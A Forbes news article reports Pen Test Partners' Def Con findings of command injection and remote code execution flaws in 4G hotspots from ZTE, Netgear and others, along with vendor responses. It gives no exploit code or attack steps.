BETA
This is a BETA experience. You may opt-out by clicking here

More From Forbes

Edit Story

Warning As 4G Hotspots Are Hacked, Putting Millions Of Users At Risk

Following
This article is more than 4 years old.

4G hotspots can be hacked, according to security researchers who shared their findings at Def Con this weekend. The team at Pen Test Partners claimed to have found "multiple vulnerabilities" in devices sourced from well known vendors. "A lot of existing 4G modems and routers are pretty insecure," the team explained. "We found critical remotely-exploitable flaws in a selection of devices from a variety of vendors, without having to do too much work."

As the world awaits the promise of 5G, "manufacturers who are going to be selling 5G routers are currently selling 3G and 4G routers, which—and we really cannot stress this enough—are mainly bad." And that leads to a further note of caution. The small pool of "OEMs working seriously with cellular technologies" are likely to morph vulnerable device software to new 5G devices. And that could have a high impact, as consumers look at 5G routers at entry points into the new networking technology.

Those vulnerabilities included command injection and remote code execution. And the hack was as easy as waiting for a vulnerable device to visit a maliciously coded website. Once done, traffic from the hotspot can be redirected by the attacker. With some devices, the hacker can also pull the passwords giving access to logs of websites visited and other user information.

Most of the 4G routers contained multiple layers that presented openings for an attack—the underlying Linux OS and then both normal IP router and cellular interfaces. "We’ve reported everything we found to vendors, who have mainly fixed the issues (except when they haven’t—and by now they’ve had more than long enough)."

The research criticized vendors for being "generally poor at responding to disclosure attempts," and singled out China's ZTE for dismissing concerns as relating to an end-of-life product (MF910), meaning the issue would not be fixed. Despite this, the researchers found ZTE was still selling [the device] from their own online store."

The team then tested a separate ZTE device (MF920), finding "almost the exact same issues." The vulnerability on the newer device has been fixed, but the researchers believe this shows that ZTE is addressing the issue on a "per-device" basis, despite the shared codebase.

The team found a different set of issues on Netgear's Nighthawk M1, and provide what they claim to be a "walkthrough of how one might fully decrypt any current Netgear Nighthawk M1 firmware using only 'easily-Googleable' public information" here.

A spokesperson for Netgear told me that "the company is aware of a report related to firmware image encryption on the MR1100, also known as the Netgear M1 Mobile Router. It was reported that a Netgear M1 Mobile Router firmware image was partially decrypted, which simplifies the process of looking for potential security weaknesses. The report did not identify any security-related vulnerabilities in the firmware itself."

Although Netgear "continues to be committed to exploring new methods of enhancing firmware image security," the spokesperson said that the company "has no current plans" to issue a release for the M1 router because "the image encryption is stripped off as part of the Netgear M1 Mobile Router firmware update process and has no operational impact on the usage of the product; at this time, no security issues related to the Netgear M1 Mobile Router firmware have been identified as a result of bypassing the firmware image encryption; and changing the encryption mechanism for existing products in the field cannot be done without exposing the new encryption keys and methods to the same reverse engineering techniques in the report."

ZTE was also approached for any comments on this story.

The Pen Test team found other issues with other device manufacturers, they say, which have not been disclosed albeit the impacted vendors have been informed. They did hint at a "post-authentication DoS in a Huawei dongle and a few command injections in a TP-Link router," though.

There is plenty of cautionary advice warning users of the dangers of public hotspots, the need to use VPNs or avoid such networks altogether. The same levels of advice as has been provided for hotel and airport wifi, the trade-off between security and convenience. But, at least according to this research, even private hotspots can be a danger to their users.

Just as worryingly, the research also suggests that a common and vulnerable code base could well be an endemic issue for certain flavors of devices, with no signs that the issues will be fully resolved anytime soon. And the danger with that is that these vulnerabilities are now out in the open, leaving users at even more risk than before.

Updated on 17 August with statement from Netgear

Follow me on Twitter or LinkedIn